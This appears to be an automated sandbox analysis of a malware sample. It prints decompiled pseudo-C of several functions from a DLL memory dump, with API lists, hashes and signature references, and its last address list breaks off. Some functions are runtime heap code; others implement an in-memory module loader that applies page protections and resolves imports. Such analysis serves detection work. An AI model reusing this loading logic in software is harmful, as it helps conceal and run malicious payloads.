                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                  • Opcode ID: d780af77af3ab278b6395a02338741367fa495b444a8d1c9c9272429d9e468c3
                                                                                                                                                                  • Instruction ID: 3e12d920bd94fb88c3074afbf6a3b3a9ea402cf26d7ac91cde5cb1516b55b14c
                                                                                                                                                                  • Opcode Fuzzy Hash: d780af77af3ab278b6395a02338741367fa495b444a8d1c9c9272429d9e468c3
                                                                                                                                                                  • Instruction Fuzzy Hash: 44016735A0531AAAFB10DBB18C86F5E3AA4EF023E9F210109F508AA0D5DF34A940DF56
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000CEBD, Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E1000CEBD(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10335310; // 0xaa0000
					_t20 = _t30;
					if(_t32 == 0) {
						E10011F42(_t12, _t18, _t20, _t32);
						E10011DA2(0x1e);
						E10011B04(0xff);
					}
					_t1 =  *0x10337f3c; // 0x1
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE60(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10335310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103357e4 == _t2) {
							 *((intOrPtr*)(E1000F780(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F780(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E1001092A(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}


















                                                                                                                                                                  0x1000cebd
                                                                                                                                                                  0x1000cebe
                                                                                                                                                                  0x1000cec6
                                                                                                                                                                  0x1000cec8
                                                                                                                                                                  0x1000cece
                                                                                                                                                                  0x1000ced0
                                                                                                                                                                  0x1000ced2
                                                                                                                                                                  0x1000ced9
                                                                                                                                                                  0x1000cee3
                                                                                                                                                                  0x1000cee9
                                                                                                                                                                  0x1000ceea
                                                                                                                                                                  0x1000cef2
                                                                                                                                                                  0x1000cf02
                                                                                                                                                                  0x1000cf05
                                                                                                                                                                  0x1000cf12
                                                                                                                                                                  0x1000cf12
                                                                                                                                                                  0x1000cf14
                                                                                                                                                                  0x1000cf18
                                                                                                                                                                  0x1000cf18
                                                                                                                                                                  0x1000cf18
                                                                                                                                                                  0x1000cf1c
                                                                                                                                                                  0x1000cf1c
                                                                                                                                                                  0x1000cf1f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000cf07
                                                                                                                                                                  0x1000cf07
                                                                                                                                                                  0x1000cf08
                                                                                                                                                                  0x1000cf0d
                                                                                                                                                                  0x1000cf10
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000cf10
                                                                                                                                                                  0x1000cef4
                                                                                                                                                                  0x1000cef6
                                                                                                                                                                  0x1000cefe
                                                                                                                                                                  0x1000cefe
                                                                                                                                                                  0x1000cef8
                                                                                                                                                                  0x1000cef8
                                                                                                                                                                  0x1000cef8
                                                                                                                                                                  0x1000ceff
                                                                                                                                                                  0x1000cf20
                                                                                                                                                                  0x1000cf20
                                                                                                                                                                  0x1000cf27
                                                                                                                                                                  0x1000cf27
                                                                                                                                                                  0x1000cf29
                                                                                                                                                                  0x1000cf2d
                                                                                                                                                                  0x1000cf37
                                                                                                                                                                  0x1000cf38
                                                                                                                                                                  0x1000cf4c
                                                                                                                                                                  0x1000cf4e
                                                                                                                                                                  0x1000cf53
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000cf38
                                                                                                                                                                  0x1000cf5b
                                                                                                                                                                  0x1000cf3a
                                                                                                                                                                  0x1000cf3b
                                                                                                                                                                  0x1000cf40
                                                                                                                                                                  0x1000cf42
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 1000CED2
                                                                                                                                                                    • Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F69
                                                                                                                                                                    • Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F73
                                                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 1000CED9
                                                                                                                                                                    • Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E0E
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E1F
                                                                                                                                                                    • Part of subcall function 10011DA2: GetModuleFileNameA.KERNEL32(00000000,103354E9,00000104,?,103352E0,00000000), ref: 10011E3B
                                                                                                                                                                    • Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E50
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E63
                                                                                                                                                                    • Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E6C
                                                                                                                                                                    • Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E79
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011EA6
                                                                                                                                                                    • Part of subcall function 10011B04: ___crtCorExitProcess.LIBCMT ref: 10011B08
                                                                                                                                                                    • Part of subcall function 10011B04: ExitProcess.KERNEL32 ref: 10011B12
                                                                                                                                                                    • Part of subcall function 1000CE60: ___sbh_alloc_block.LIBCMT ref: 1000CE88
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 1000CF27
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3791426274-0
                                                                                                                                                                  • Opcode ID: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
                                                                                                                                                                  • Instruction ID: e2b4030b7ffdff5dfd6972142c91b8fd57cf3792c5bc4284219116a52f4c6e3d
                                                                                                                                                                  • Opcode Fuzzy Hash: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
                                                                                                                                                                  • Instruction Fuzzy Hash: 17012B3664936F5AF221D3699C81D7A72DDDB847F0B220036F908CA19ACA60DC419192
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001B220, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E1001B220(intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				int _t67;

				if(_a8[2] != 0) {
					_t4 =  &(_a8[3]); // 0x1
					if(( *_t4 & 0x02000000) == 0) {
						_t31 =  &(_a8[3]); // 0x1
						asm("sbb edx, edx");
						_v16 =  ~( ~( *_t31 & 0x20000000));
						_t34 =  &(_a8[3]); // 0x1
						asm("sbb ecx, ecx");
						_v24 =  ~( ~( *_t34 & 0x40000000));
						_t37 =  &(_a8[3]); // 0x1
						asm("sbb eax, eax");
						_v12 =  ~( ~( *_t37 & 0x80000000));
						_t42 = _v24 * 8; // 0x2035072d
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103350c4 + _v12 * 4));
						_t49 =  &(_a8[3]); // 0x1
						if(( *_t49 & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t55 =  &(_a8[2]); // 0xb805ebc0
						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							_push("Error protecting memory page");
							E1001AEC0(_t67);
							return 0;
						}
					}
					_t7 =  &(_a8[1]); // 0x330475c0
					if( *_a8 !=  *_t7) {
						L8:
						return 1;
					}
					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L7:
						_t26 =  &(_a8[2]); // 0xb805ebc0
						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
						goto L8;
					} else {
						_t16 =  &(_a8[2]); // 0xb805ebc0
						if( *_t16 %  *(_a4 + 0x3c) != 0) {
							goto L8;
						}
						goto L7;
					}
				}
				return 1;
			}









                                                                                                                                                                  0x1001b22d
                                                                                                                                                                  0x1001b23c
                                                                                                                                                                  0x1001b245
                                                                                                                                                                  0x1001b2b0
                                                                                                                                                                  0x1001b2bb
                                                                                                                                                                  0x1001b2bf
                                                                                                                                                                  0x1001b2c5
                                                                                                                                                                  0x1001b2d0
                                                                                                                                                                  0x1001b2d4
                                                                                                                                                                  0x1001b2da
                                                                                                                                                                  0x1001b2e4
                                                                                                                                                                  0x1001b2e8
                                                                                                                                                                  0x1001b2f4
                                                                                                                                                                  0x1001b301
                                                                                                                                                                  0x1001b307
                                                                                                                                                                  0x1001b310
                                                                                                                                                                  0x1001b31b
                                                                                                                                                                  0x1001b31b
                                                                                                                                                                  0x1001b329
                                                                                                                                                                  0x1001b333
                                                                                                                                                                  0x1001b33b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b33d
                                                                                                                                                                  0x1001b33d
                                                                                                                                                                  0x1001b342
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b34a
                                                                                                                                                                  0x1001b33b
                                                                                                                                                                  0x1001b24f
                                                                                                                                                                  0x1001b252
                                                                                                                                                                  0x1001b2a3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b2a3
                                                                                                                                                                  0x1001b25b
                                                                                                                                                                  0x1001b27f
                                                                                                                                                                  0x1001b28e
                                                                                                                                                                  0x1001b29e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b26d
                                                                                                                                                                  0x1001b273
                                                                                                                                                                  0x1001b27d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b27d
                                                                                                                                                                  0x1001b25b
                                                                                                                                                                  0x00000000

                                                                                                                                                                  Strings
                                                                                                                                                                  • Error protecting memory page, xrefs: 1001B33D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Error protecting memory page
                                                                                                                                                                  • API String ID: 0-1748499907
                                                                                                                                                                  • Opcode ID: 2fdaa3f8ac2132a0ab7f5db0e2b56953538e95dc798f7bf7b4009c1be8786609
                                                                                                                                                                  • Instruction ID: 5374f92ac9c7a156fd4897085e59d133f9b4e73f21f8500888812b2ad4014a11
                                                                                                                                                                  • Opcode Fuzzy Hash: 2fdaa3f8ac2132a0ab7f5db0e2b56953538e95dc798f7bf7b4009c1be8786609
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E41B774A0450A9FDB08CF58C490B99B3B6FB88354F24C259EC1A9F355D771EE91CB80
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000F81F, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1000F81F(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10335310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F7C4(__eflags);
					__eflags = _t7 - 3;
					 *0x10337f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA94(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10335310);
							 *0x10335310 =  *0x10335310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                                                  0x1000f830
                                                                                                                                                                  0x1000f838
                                                                                                                                                                  0x1000f83d
                                                                                                                                                                  0x1000f842
                                                                                                                                                                  0x1000f847
                                                                                                                                                                  0x1000f84a
                                                                                                                                                                  0x1000f84f
                                                                                                                                                                  0x1000f875
                                                                                                                                                                  0x1000f877
                                                                                                                                                                  0x1000f878
                                                                                                                                                                  0x1000f851
                                                                                                                                                                  0x1000f856
                                                                                                                                                                  0x1000f85b
                                                                                                                                                                  0x1000f85e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000f860
                                                                                                                                                                  0x1000f866
                                                                                                                                                                  0x1000f86c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000f86c
                                                                                                                                                                  0x1000f85e
                                                                                                                                                                  0x1000f83f
                                                                                                                                                                  0x1000f83f
                                                                                                                                                                  0x1000f841
                                                                                                                                                                  0x1000f841

                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,1000EA0F,00000001), ref: 1000F830
                                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 1000F866
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$CreateDestroy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3296620671-0
                                                                                                                                                                  • Opcode ID: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
                                                                                                                                                                  • Instruction ID: 18601b020fc9775d6ac859e2e5d9de66436f62596d67e2443513b26528c1d1d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
                                                                                                                                                                  • Instruction Fuzzy Hash: 0DE06574628312ABF700EB314C897A535D8E7807D2F21483DF404C84E5FFA0C640A741
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A9C0, Relevance: 2.6, APIs: 2, Instructions: 87memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E1001A9C0(void* _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebp;
				void* _t49;
				void* _t52;
				intOrPtr _t60;
				void* _t68;
				void* _t70;
				signed int _t76;
				signed int _t87;
				signed int _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_t49 = _a4;
				_v8 = _t49;
				if(_v8 != 0) {
					__eflags =  *(_v8 + 0x10);
					if(__eflags != 0) {
						_t9 =  *_v8 + 0x28; // 0x1ab8068
						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9;
						__eflags = _t93;
						_v12 = _t93;
						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0);
					}
					_push( *((intOrPtr*)(_v8 + 0x30)));
					E1000CA40(_t68, _t94, _t95, __eflags);
					_t97 = _t96 + 4;
					_t70 = _v8;
					__eflags =  *(_t70 + 8);
					if( *(_t70 + 8) == 0) {
						L12:
						_t52 = _v8;
						__eflags =  *(_t52 + 4);
						if( *(_t52 + 4) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed
						}
						return HeapFree(GetProcessHeap(), 0, _v8);
					} else {
						_v16 = 0;
						while(1) {
							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc));
							if(__eflags >= 0) {
								break;
							}
							_t60 =  *((intOrPtr*)(_v8 + 8));
							_t76 = _v16;
							__eflags =  *(_t60 + _t76 * 4);
							if( *(_t60 + _t76 * 4) != 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed
								_t97 = _t97 + 8;
							}
							_t87 = _v16 + 1;
							__eflags = _t87;
							_v16 = _t87;
						}
						_push( *((intOrPtr*)(_v8 + 8)));
						E1000CA40(_t68, _t94, _t95, __eflags);
						_t97 = _t97 + 4;
						goto L12;
					}
				}
				return _t49;
			}



















                                                                                                                                                                  0x1001a9c6
                                                                                                                                                                  0x1001a9c9
                                                                                                                                                                  0x1001a9d0
                                                                                                                                                                  0x1001a9da
                                                                                                                                                                  0x1001a9de
                                                                                                                                                                  0x1001a9eb
                                                                                                                                                                  0x1001a9eb
                                                                                                                                                                  0x1001a9eb
                                                                                                                                                                  0x1001a9ee
                                                                                                                                                                  0x1001a9fc
                                                                                                                                                                  0x1001a9fc
                                                                                                                                                                  0x1001aa05
                                                                                                                                                                  0x1001aa06
                                                                                                                                                                  0x1001aa0b
                                                                                                                                                                  0x1001aa0e
                                                                                                                                                                  0x1001aa11
                                                                                                                                                                  0x1001aa15
                                                                                                                                                                  0x1001aa73
                                                                                                                                                                  0x1001aa73
                                                                                                                                                                  0x1001aa76
                                                                                                                                                                  0x1001aa7a
                                                                                                                                                                  0x1001aa97
                                                                                                                                                                  0x1001aa99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001aa17
                                                                                                                                                                  0x1001aa17
                                                                                                                                                                  0x1001aa29
                                                                                                                                                                  0x1001aa2f
                                                                                                                                                                  0x1001aa32
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001aa37
                                                                                                                                                                  0x1001aa3a
                                                                                                                                                                  0x1001aa3d
                                                                                                                                                                  0x1001aa41
                                                                                                                                                                  0x1001aa5d
                                                                                                                                                                  0x1001aa5f
                                                                                                                                                                  0x1001aa5f
                                                                                                                                                                  0x1001aa23
                                                                                                                                                                  0x1001aa23
                                                                                                                                                                  0x1001aa26
                                                                                                                                                                  0x1001aa26
                                                                                                                                                                  0x1001aa6a
                                                                                                                                                                  0x1001aa6b
                                                                                                                                                                  0x1001aa70
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001aa70
                                                                                                                                                                  0x1001aa15
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA9C), ref: 1001AAA2
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,1001BA9C), ref: 1001AAA9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                                  • Opcode ID: b0cc8eedbf95d30c958b110f402096a7116ea42a7fdb31a7e597f4bb8bd16cc3
                                                                                                                                                                  • Instruction ID: 036dfcbbb1d5d3e23a27430c7b480aaf999080cef5cc33bc9f92b78f6dea735d
                                                                                                                                                                  • Opcode Fuzzy Hash: b0cc8eedbf95d30c958b110f402096a7116ea42a7fdb31a7e597f4bb8bd16cc3
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C319278A00108EFDB04DB94C684B9DB7B6FF89304F648198E9055B391D775EE81DB81
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001AC03, Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                                                  			E1001AC03() {
				signed int _t93;
				intOrPtr _t97;
				signed int _t99;
				signed int _t106;
				signed int _t114;
				void* _t116;
				void* _t121;
				void* _t127;
				signed int _t173;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				L0:
				while(1) {
					L0:
					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
						break;
					}
					L3:
					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
					_t186 = _t184 + 8;
					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
						L5:
						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
						_push(4 +  *_t17 * 4);
						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
						_push( *_t21);
						_t99 = E1000E078(_t127,  *_t21, _t180, _t181, __eflags);
						_t187 = _t186 + 8;
						 *(_t182 - 0x18) = _t99;
						__eflags =  *(_t182 - 0x18);
						if( *(_t182 - 0x18) != 0) {
							L7:
							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
							__eflags =  *( *(_t182 - 4));
							if( *( *(_t182 - 4)) == 0) {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								__eflags = _t106;
								 *(_t182 - 0x14) = _t106;
							} else {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
							}
							while(1) {
								L12:
								__eflags =  *( *(_t182 - 0x1c));
								if( *( *(_t182 - 0x1c)) == 0) {
									break;
								}
								L13:
								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
									__eflags = _t114;
									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t116;
								} else {
									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t121;
								}
								L16:
								__eflags =  *( *(_t182 - 0x14));
								if( *( *(_t182 - 0x14)) != 0) {
									L18:
									L11:
									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
									_t173 =  *(_t182 - 0x14) + 4;
									__eflags = _t173;
									 *(_t182 - 0x14) = _t173;
									continue;
								} else {
									L17:
									 *(_t182 - 0xc) = 0;
								}
								break;
							}
							L19:
							__eflags =  *(_t182 - 0xc);
							if(__eflags != 0) {
								L21:
								continue;
							} else {
								L20:
								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
								SetLastError(0x7f);
							}
						} else {
							L6:
							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
							SetLastError(0xe);
							 *(_t182 - 0xc) = 0;
						}
					} else {
						L4:
						SetLastError(0x7e);
						 *(_t182 - 0xc) = 0;
					}
					break;
				}
				L22:
				_t93 =  *(_t182 - 0xc);
				return _t93;
			}


















                                                                                                                                                                  0x1001ac03
                                                                                                                                                                  0x1001ac03
                                                                                                                                                                  0x1001ac03
                                                                                                                                                                  0x1001ac09
                                                                                                                                                                  0x1001ac1a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac2d
                                                                                                                                                                  0x1001ac30
                                                                                                                                                                  0x1001ac41
                                                                                                                                                                  0x1001ac44
                                                                                                                                                                  0x1001ac46
                                                                                                                                                                  0x1001ac49
                                                                                                                                                                  0x1001ac50
                                                                                                                                                                  0x1001ac66
                                                                                                                                                                  0x1001ac69
                                                                                                                                                                  0x1001ac73
                                                                                                                                                                  0x1001ac77
                                                                                                                                                                  0x1001ac7a
                                                                                                                                                                  0x1001ac7b
                                                                                                                                                                  0x1001ac80
                                                                                                                                                                  0x1001ac83
                                                                                                                                                                  0x1001ac86
                                                                                                                                                                  0x1001ac8a
                                                                                                                                                                  0x1001acb6
                                                                                                                                                                  0x1001acbc
                                                                                                                                                                  0x1001acc2
                                                                                                                                                                  0x1001acc8
                                                                                                                                                                  0x1001acce
                                                                                                                                                                  0x1001acd4
                                                                                                                                                                  0x1001acdd
                                                                                                                                                                  0x1001ace3
                                                                                                                                                                  0x1001ace6
